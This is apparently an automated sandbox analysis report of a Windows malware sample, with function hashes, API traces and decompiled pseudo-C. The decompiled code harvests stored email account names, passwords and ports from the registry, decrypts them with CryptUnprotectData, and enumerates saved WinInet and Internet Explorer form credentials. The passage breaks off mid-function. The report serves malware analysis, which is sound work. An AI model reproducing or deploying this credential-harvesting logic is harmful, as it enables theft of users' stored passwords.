Opcode ID: f394a0ce6969e15c3ee1ec379a35e6e47bdf13378b7d96cba557d45ce04e14a6
Instruction ID: f4faf133eef6291e94134219e50fa88ba60f1e5d5e2a04af4eeb759177ed7e1c
Opcode Fuzzy Hash: f394a0ce6969e15c3ee1ec379a35e6e47bdf13378b7d96cba557d45ce04e14a6
Instruction Fuzzy Hash: 05014F71A20224AFDB65DB54C946BAEB3E9EF28700F00406EF515A7691DBB4DE00CB55

Uniqueness

Uniqueness Score: -1.00%

Function 001D2A7D, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 001D2AAA

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: 28c425e206b2cf52dfe04f639bab851ea583fd6e8d2ca6656d372f70f48ae937
Instruction ID: 2e262b59116f7a326efdb50edcda2e49d3493e8cb44dd811bfff652f4e54bd6f
Opcode Fuzzy Hash: 28c425e206b2cf52dfe04f639bab851ea583fd6e8d2ca6656d372f70f48ae937
Instruction Fuzzy Hash: 3F015E74209B008FD369CF28D580912B7F1FF8A3103558A9EE89A8BB64C730F801CF54

Uniqueness

Uniqueness Score: -1.00%

Function 001CA981, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 001CA99A

Part of subcall function 001FEFBC: FindNextFileW.KERNEL32(?,?,?,001CAA65,?,?,?,?,?,?,?,?,00000000), ref: 001FEFC5

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileFindNext___std_fs_directory_iterator_advance@8
String ID:
API String ID: 3878998205-0
Opcode ID: b14b9e766cb8d11d923b8eae4732c20c70cd9244aa0c3be2c5f5584d1c561765
Instruction ID: c338a454ad9fa0e372089c98178a24f85e7d65c9312897828f8d9f817e78e804
Opcode Fuzzy Hash: b14b9e766cb8d11d923b8eae4732c20c70cd9244aa0c3be2c5f5584d1c561765
Instruction Fuzzy Hash: 2AF0E9316105085BEF356665CD4AFBBB3D8AFB031DF45046EA986D3041E770EC408592

Uniqueness

Uniqueness Score: -1.00%

Function 0021918E, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,7FFFFFFF,?,002001D2,00000000,?,001D4650,00000000,?,4hU@[Y]W,?,?,4hU@[Y]W,4hU@[Y]W), ref: 002191C0

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b5812b80205af3f81fb646e56e9f3e23e236a6c4005d0a5a93d1bda1e7e7335b
Instruction ID: af3cddfa7439d6660f8f4e6fd156b4e1eb467f943b800d23329f98cee208ec1f
Opcode Fuzzy Hash: b5812b80205af3f81fb646e56e9f3e23e236a6c4005d0a5a93d1bda1e7e7335b
Instruction Fuzzy Hash: 68E0E53553122776EB313B699C1C7DB3ACA9F223B0F190421AC0D92692CB50CCE1D9E0

Uniqueness

Uniqueness Score: -1.00%

Function 001CAC66, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001CAC6B

Part of subcall function 001D37E4: __EH_prolog.LIBCMT ref: 001D37E9

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f6fe1338034a80d23877b2992e74e796ba2b5d1b80c27cc29e383402a7c66d4e
Instruction ID: 11967677fb12036681c1a4db8d7100c133c1a60096788c0de3bdb375ffab66eb
Opcode Fuzzy Hash: f6fe1338034a80d23877b2992e74e796ba2b5d1b80c27cc29e383402a7c66d4e
Instruction Fuzzy Hash: 63F06DB5E24629AFCF14DFB8D801A8ABBE4EF68314B10896FB405D3700E770DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 001CA676, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__EH_prolog2.LIBCMT ref: 001CA67D

Part of subcall function 001CA2D4: __EH_prolog.LIBCMT ref: 001CA2D9

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prologH_prolog2
String ID:
API String ID: 1160199830-0
Opcode ID: a1ad27333a8eeb27d3f82f51daee8f3b811ab3753b8d316023dc4e5cd1de8cc8
Instruction ID: 19d299495561ce2dc5e783c6c1eb29044d72b4dfabf2ea917aa6a89638366d7d
Opcode Fuzzy Hash: a1ad27333a8eeb27d3f82f51daee8f3b811ab3753b8d316023dc4e5cd1de8cc8
Instruction Fuzzy Hash: 54F03071924128BBDF14EBA0DC4AFDE7B78BF26310F548098F544A71D6DB74AA18CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001CAF03, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001CAF08

Part of subcall function 001D3886: __EH_prolog.LIBCMT ref: 001D388B

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 06cc92bae2e0d3ab8ca899c43d026281d9dc6d4657334fa0e4f60711607c390b
Instruction ID: bc695d8a94e3e9adb15a8fffc1f069b5e149524467dcd8d85f4e6c474e0f6077
Opcode Fuzzy Hash: 06cc92bae2e0d3ab8ca899c43d026281d9dc6d4657334fa0e4f60711607c390b
Instruction Fuzzy Hash: 94E065B5A25215ABCB14DFA8D80168A76E4EF18714B10892EB415D3300E774D9008790

Uniqueness

Uniqueness Score: -1.00%

Function 001DC959, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

___std_fs_set_current_path@4.LIBCPMT ref: 001DC967

Part of subcall function 001CA676: __EH_prolog2.LIBCMT ref: 001CA67D

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog2___std_fs_set_current_path@4
String ID:
API String ID: 2482923176-0
Opcode ID: f4617e3132e9913c34343accb15db7cc2e7aad98cc5acdebcf4332c6d525c0e2
Instruction ID: b010ce61ea7e94c0762d3c57fa3016ffdef1db7dd6c0c72da8689be71e011a0c
Opcode Fuzzy Hash: f4617e3132e9913c34343accb15db7cc2e7aad98cc5acdebcf4332c6d525c0e2
Instruction Fuzzy Hash: 98C01230622625438B2965ACB91889751DD5F2A7097108C2FB481D3744E770CD42C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 00205A55, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00205A68

Part of subcall function 00217FE3: RtlFreeHeap.NTDLL(00000000,00000000,?,0022146B,?,00000000,?,4hU@[Y]W,?,0022170E,?,00000007,?,?,00221B0F,?), ref: 00217FF9
Part of subcall function 00217FE3: GetLastError.KERNEL32(?,?,0022146B,?,00000000,?,4hU@[Y]W,?,0022170E,?,00000007,?,?,00221B0F,?,?), ref: 0021800B

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: e604c8a294d64a0052e12ad6042e8ff2da1b84093215c4a0307e54f67f5992e0
Instruction ID: 934d09c8681fd35840e3879252fb4cb6971331b8e74d443724ded87e96080459
Opcode Fuzzy Hash: e604c8a294d64a0052e12ad6042e8ff2da1b84093215c4a0307e54f67f5992e0
Instruction Fuzzy Hash: A1C08C31004208BBCB009B41C80AE8E7BB9DB80364F200044F41417240CAB1EF409A80

Uniqueness

Uniqueness Score: -1.00%

Function 001EA869, Relevance: 1.3, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 001EA878

Part of subcall function 001EA224: CoCreateInstance.OLE32(0022DB80,00000000,00000015,0022DBA0,?), ref: 001EA244

Part of subcall function 001EA130: lstrlenW.KERNEL32(?), ref: 001EA156
Part of subcall function 001EA130: lstrlenW.KERNEL32(00000002), ref: 001EA167
Part of subcall function 001EA130: CredEnumerateW.SECHOST(Microsoft_WinInet_*,00000000,00000000,?), ref: 001EA190
Part of subcall function 001EA130: CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000001,?), ref: 001EA1D6
Part of subcall function 001EA130: LocalFree.KERNEL32(?), ref: 001EA200
Part of subcall function 001EA130: CredFree.ADVAPI32(?), ref: 001EA219

Part of subcall function 001EA2F9: GetVersionExW.KERNEL32(?), ref: 001EA341
Part of subcall function 001EA2F9: LoadLibraryA.KERNEL32(?), ref: 001EA395
Part of subcall function 001EA2F9: GetProcAddress.KERNEL32(00000000,?), ref: 001EA3E2
Part of subcall function 001EA2F9: GetProcAddress.KERNEL32(00000000,?), ref: 001EA41E
Part of subcall function 001EA2F9: GetProcAddress.KERNEL32(00000000,?), ref: 001EA45E

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$CredFreelstrlen$CreateCryptDataEnumerateInitializeInstanceLibraryLoadLocalUnprotectVersion
String ID:
API String ID: 1367598280-0
Opcode ID: fa42afa4f5f69e39855fc9ecbe6d82b658ecc27eec57da53a93af3324310da6d
Instruction ID: 2acf239b0d321c9094c3a357c2a4cc54a04c255f619f2705df42b42387bff9f9
Opcode Fuzzy Hash: fa42afa4f5f69e39855fc9ecbe6d82b658ecc27eec57da53a93af3324310da6d
Instruction Fuzzy Hash: 52E0C230068645ABC214EB51DD0BB6EB3D8DF60B11F40865CB99C121D0AF70BD04DA57

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001F4A5F, Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 282
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E001F4A5F(signed int __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				void* _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				void* _v36;
				CHAR* _v40;
				void* _v44;
				WCHAR* _v48;
				signed int _v52;
				CHAR* _v56;
				CHAR* _v60;
				CHAR* _v64;
				char _v68;
				WCHAR* _v72;
				char _v80;
				signed int _v84;
				CHAR* _v88;
				CHAR* _v92;
				CHAR* _v96;
				CHAR* _v100;
				CHAR* _v104;
				CHAR* _v108;
				CHAR* _v112;
				CHAR* _v116;
				CHAR* _v120;
				CHAR* _v124;
				CHAR* _v128;
				CHAR* _v132;
				CHAR* _v136;
				CHAR* _v140;
				CHAR* _v144;
				CHAR* _v148;
				char _v152;
				WCHAR* _v156;
				signed int _t90;
				signed int _t92;
				WCHAR** _t96;
				intOrPtr _t99;
				intOrPtr _t108;
				signed int _t116;
				void* _t120;
				WCHAR** _t141;
				WCHAR** _t142;
				intOrPtr* _t143;
				WCHAR** _t144;
				void* _t159;
				signed int _t190;
				WCHAR* _t193;
				WCHAR* _t194;
				WCHAR* _t195;
				WCHAR* _t196;
				void* _t202;

				_t146 = __ecx;
				_v84 = _v84 & 0x00000000;
				_t193 = L"SMTP Email Address";
				_v152 = L"SMTP Server";
				_t190 = __ecx;
				_v156 = _t193;
				_v148 = L"POP3 Server";
				_t141 =  &_v152;
				_v144 = L"POP3 User Name";
				_v140 = L"SMTP User Name";
				_v136 = L"NNTP Email Address";
				_v132 = L"NNTP User Name";
				_v128 = L"NNTP Server";
				_v124 = L"IMAP Server";
				_v120 = L"IMAP User Name";
				_v116 = L"Email";
				_v112 = L"HTTP User";
				_v108 = L"HTTP Server URL";
				_v104 = L"POP3 User";
				_v100 = L"IMAP User";
				_v96 = L"HTTPMail User Name";
				_v92 = L"HTTPMail Server";
				_v88 = L"SMTP User";
				do {
					_t146 = 0x80000001;
					_t90 = E001F592B(0x80000001, _a4, _t193, 0, 0x80000001, 0);
					_t202 = _t202 + 0x10;
					_v8 = _t90;
					if(_t90 != 0) {
						E001F5A1E(_t190, _t193, lstrlenW(_t193));
						E001F5ADB(_t190, ":", 1);
						E001F5A1E(_t190, _v8, lstrlenW(_v8));
						_t146 = _t190;
						E001F5ADB(_t190, "\n", 1);
						E00205A55(_v8);
						_t202 = _t202 + 0xc;
					}
					_t193 =  *_t141;
					_t141 =  &(_t141[1]);
				} while (_t193 != 0);
				_v28 = _v28 & 0x00000000;
				_t142 =  &_v44;
				_t194 = L"POP3 Password2";
				_v44 = L"IMAP Password2";
				_v48 = _t194;
				_v40 = L"NNTP Password2";
				_v36 = L"HTTPMail Password2";
				_v32 = L"SMTP Password2";
				do {
					_v12 = _v12 & 0x00000000;
					_t146 = 0x80000001;
					_t92 = E001F592B(0x80000001, _a4, _t194,  &_v12, 0x80000001, 0);
					_t202 = _t202 + 0x10;
					_v8 = _t92;
					if(_t92 != 0) {
						E001F5A1E(_t190, _t194, lstrlenW(_t194));
						E001F5ADB(_t190, ":", 1);
						E001F5A1E(_t190, _v8, _v12 >> 1);
						_t146 = _t190;
						E001F5ADB(_t190, "\n", 1);
						E00205A55(_v8);
						_t202 = _t202 + 0x14;
					}
					_t194 =  *_t142;
					_t142 =  &(_t142[1]);
				} while (_t194 != 0);
				_v52 = _v52 & 0x00000000;
				_t195 = L"POP3 Password";
				_v68 = L"IMAP Password";
				_v72 = _t195;
				_v64 = L"NNTP Password";
				_v60 = L"HTTP Password";
				_v56 = L"SMTP Password";
				_v8 =  &_v68;
				do {
					_v12 = _v12 & 0x00000000;
					_t146 = 0x80000001;
					_t143 = E001F592B(0x80000001, _a4, _t195,  &_v12, 0x80000001, 0);
					_t202 = _t202 + 0x10;
					if(_t143 != 0) {
						_t146 = _v12;
						if(_t146 > 1) {
							_t108 =  *_t143;
							if(_t108 == 1) {
								L19:
								E001F5A1E(_t190, _t195, lstrlenW(_t195));
								E001F5ADB(_t190, ":", 1);
								_t71 = _t143 + 1; // 0x1
								E001F5A1E(_t190, _t71, lstrlenW(_t71));
								E001F5ADB(_t190, "\n", 1);
							} else {
								if(_t108 == 2) {
									_t159 = _t146 - 1;
									_t54 = _t143 + 1; // 0x1
									_t116 = _t54;
									_v12 = _t159;
									_v16 = 0;
									_v32 = _t159;
									_v28 = _t116;
									_v20 = 0;
									if(_t116 != 0) {
										_push( &_v24);
										_push(1);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push( &_v32);
										if( *0x22d058() != 0) {
											_t120 = _v20;
											if(_t120 != 0) {
												_t160 = _v24;
												if(_v24 < _v12) {
													_t65 = _t143 + 1; // 0x1
													_v16 = 1;
													E00201550(_t65, _t120, _t160);
													_t202 = _t202 + 0xc;
													_v12 = _v24;
													_t120 = _v20;
												}
												LocalFree(_t120);
												if(_v16 != 0) {
													goto L19;
												}
											}
										}
									}
								}
							}
							E00205A55(_t143);
							_pop(_t146);
						}
					}
					_t96 = _v8;
					_t195 =  *_t96;
					_v8 =  &(_t96[1]);
				} while (_t195 != 0);
				_v28 = _v28 & 0x00000000;
				_t144 =  &_v36;
				_t196 = L"POP3 Port";
				_v36 = L"SMTP Port";
				_v40 = _t196;
				_v32 = L"IMAP Port";
				do {
					_v8 = _v8 & 0x00000000;
					_t146 = 0x80000001;
					_t99 = E001F592B(0x80000001, _a4, _t196,  &_v8, 0x80000001, 0);
					_t202 = _t202 + 0x10;
					_v16 = _t99;
					if(_t99 != 0 && _v8 == 4) {
						E001F5A1E(_t190, _t196, lstrlenW(_t196));
						E001F5ADB(_t190, ":", 1);
						wsprintfA( &_v80, "%d\n",  *_v16);
						_t202 = _t202 + 0x14;
						E001F5ADB(_t190,  &_v80, lstrlenA( &_v80));
						_t99 = E00205A55(_v16);
						_pop(_t146);
					}
					_t196 =  *_t144;
					_t144 =  &(_t144[1]);
				} while (_t196 != 0);
				return _t99;
			}

0x001f4a5f
0x001f4a68
0x001f4a6e
0x001f4a73
0x001f4a7e
0x001f4a80
0x001f4a86
0x001f4a90
0x001f4a96
0x001f4aa0
0x001f4aaa
0x001f4ab4
0x001f4abb
0x001f4ac2
0x001f4ac9
0x001f4ad0
0x001f4ad7
0x001f4ade
0x001f4ae5
0x001f4aec
0x001f4af3
0x001f4afa
0x001f4b01
0x001f4b08
0x001f4b11
0x001f4b16
0x001f4b1b
0x001f4b1e
0x001f4b23
0x001f4b31
0x001f4b3f
0x001f4b55
0x001f4b61
0x001f4b63
0x001f4b69
0x001f4b6e
0x001f4b6e
0x001f4b71
0x001f4b73
0x001f4b76
0x001f4b7a
0x001f4b7e
0x001f4b81
0x001f4b86
0x001f4b8d
0x001f4b90
0x001f4b97
0x001f4b9e
0x001f4ba5
0x001f4bab
0x001f4bb4
0x001f4bb9
0x001f4bbe
0x001f4bc1
0x001f4bc6
0x001f4bd4
0x001f4be2
0x001f4bf4
0x001f4c00
0x001f4c02
0x001f4c08
0x001f4c0d
0x001f4c0d
0x001f4c10
0x001f4c12
0x001f4c15
0x001f4c19
0x001f4c20
0x001f4c25
0x001f4c2c
0x001f4c2f
0x001f4c36
0x001f4c3d
0x001f4c44
0x001f4c47
0x001f4c4d
0x001f4c56
0x001f4c60
0x001f4c62
0x001f4c67
0x001f4c6d
0x001f4c73
0x001f4c79
0x001f4c7d
0x001f4cf6
0x001f4d02
0x001f4d10
0x001f4d17
0x001f4d26
0x001f4d34
0x001f4c7f
0x001f4c81
0x001f4c87
0x001f4c88
0x001f4c88
0x001f4c8d
0x001f4c90
0x001f4c93
0x001f4c96
0x001f4c99
0x001f4c9e
0x001f4ca7
0x001f4ca8
0x001f4caa
0x001f4cab
0x001f4cac
0x001f4cad
0x001f4cb1
0x001f4cba
0x001f4cbc
0x001f4cc1
0x001f4cc3
0x001f4cc9
0x001f4ccd
0x001f4cd0
0x001f4cd8
0x001f4ce0
0x001f4ce3
0x001f4ce6
0x001f4ce6
0x001f4cea
0x001f4cf4
0x00000000
0x00000000
0x001f4cf4
0x001f4cc1
0x001f4cba
0x001f4c9e
0x001f4c81
0x001f4d3c
0x001f4d41
0x001f4d41
0x001f4c73
0x001f4d42
0x001f4d45
0x001f4d4a
0x001f4d4d
0x001f4d55
0x001f4d59
0x001f4d5c
0x001f4d61
0x001f4d68
0x001f4d6b
0x001f4d72
0x001f4d78
0x001f4d81
0x001f4d86
0x001f4d8b
0x001f4d8e
0x001f4d93
0x001f4da7
0x001f4db5
0x001f4dc8
0x001f4dce
0x001f4de1
0x001f4de7
0x001f4ded
0x001f4ded
0x001f4dee
0x001f4df0
0x001f4df3
0x001f4dff

APIs

Part of subcall function 001F592B: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000100,00000100,00000000,00000000,?), ref: 001F5973
Part of subcall function 001F592B: RegQueryValueExW.KERNEL32(00000100,?,00000000,00000000,00000000,?), ref: 001F5992
Part of subcall function 001F592B: RegQueryValueExW.KERNEL32(00000100,?,00000000,00000000,00000000,?), ref: 001F59CD
Part of subcall function 001F592B: RegCloseKey.ADVAPI32(00000100), ref: 001F59EE

CryptUnprotectData.CRYPT32(0023CB80,00000000,00000000,00000000,00000000,00000001,?), ref: 001F4CB2
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001F4CEA
lstrlenW.KERNEL32(POP3 Password,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001F4CF7
lstrlenW.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001F4D1B
lstrlenW.KERNEL32(POP3 Port,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001F4D9C
wsprintfA.USER32 ref: 001F4DC8
lstrlenA.KERNEL32(?), ref: 001F4DD5
lstrlenW.KERNEL32(000007FF,?,?,00000000,00000000), ref: 001F4B4A

Part of subcall function 00205A55: _free.LIBCMT ref: 00205A68

lstrlenW.KERNEL32(SMTP Email Address,?,?,00000000,00000000), ref: 001F4B26

Part of subcall function 001F5A1E: lstrlenA.KERNEL32(?,?,74E069A0), ref: 001F5A4F
Part of subcall function 001F5A1E: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,?,74E069A0), ref: 001F5A6E
Part of subcall function 001F5A1E: lstrcpyA.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,74E069A0), ref: 001F5A91
Part of subcall function 001F5A1E: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0023935B,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,74E069A0), ref: 001F5ABD

Part of subcall function 001F5ADB: lstrlenA.KERNEL32(?,?,?,?,?,?,?,001E9C15,00000001,?,ftp://,00000006,?,Microsoft_WinInet_,00000012), ref: 001F5B00
Part of subcall function 001F5ADB: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,?,?,001E9C15,00000001,?,ftp://,00000006,?,Microsoft_WinInet_,00000012), ref: 001F5B27

lstrlenW.KERNEL32(POP3 Password2,?,?,?,?,?,?,00000000,00000000), ref: 001F4BC9

Strings

SMTP Email Address, xrefs: 001F4A6E, 001F4B10, 001F4B25
POP3 Password2, xrefs: 001F4B81, 001F4BB3, 001F4BC8
POP3 Port, xrefs: 001F4D5C, 001F4D80, 001F4D9B
POP3 Password, xrefs: 001F4C20, 001F4C55, 001F4CF6
%d, xrefs: 001F4DC2

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$ByteCharMultiQueryValueWidelstrcpy$CloseCryptDataFreeLocalOpenUnprotect_freewsprintf
String ID: %d$POP3 Password$POP3 Password2$POP3 Port$SMTP Email Address
API String ID: 2832241015-2055188240
Opcode ID: 9086ff57866eba96aaf317482ecce773475081ab1e102a9f3903e3ff0a22f119
Instruction ID: 9589cad53ac81a0d8a5850933b14b7b6bf23ed0cca55c31814366b9f5995d90b
Opcode Fuzzy Hash: 9086ff57866eba96aaf317482ecce773475081ab1e102a9f3903e3ff0a22f119
Instruction Fuzzy Hash: 44B16EB1E1021CABDF14DF94C885BFEB7BAAF44304F244059E605BB342DBB49A568F90

Uniqueness

Uniqueness Score: -1.00%

Function 001D8F0B, Relevance: 19.8, APIs: 1, Strings: 10, Instructions: 512
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E001D8F0B() {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t274;
				void* _t279;
				char _t288;
				char _t302;
				signed int _t305;
				signed int _t306;
				void* _t309;
				void* _t314;
				void* _t319;
				void* _t323;
				signed int _t331;
				signed int _t333;
				void* _t338;
				signed int _t339;
				void* _t346;
				void* _t353;
				void* _t358;
				void* _t363;
				void* _t369;
				char _t381;
				char _t399;
				char _t414;
				intOrPtr _t424;
				char _t440;
				char _t450;
				char _t455;
				intOrPtr _t465;
				char _t468;
				signed char _t482;
				signed char _t485;
				signed char _t487;
				char _t489;
				char _t491;
				signed char _t495;
				char _t498;
				void* _t503;
				intOrPtr _t505;
				intOrPtr _t506;
				intOrPtr _t507;
				signed int _t509;
				intOrPtr _t511;
				signed int _t513;
				void* _t515;
				signed int _t517;
				signed int _t518;
				intOrPtr _t519;
				signed int _t522;
				intOrPtr _t524;
				void* _t526;
				void* _t528;

				L00227790(0x228d91, _t526);
				 *(_t526 - 0x1c) = 0;
				_t381 = 0;
				 *((intOrPtr*)(_t526 - 4)) = 0;
				asm("movaps xmm0, [0x23d890]");
				_push(_t515);
				_push(_t503);
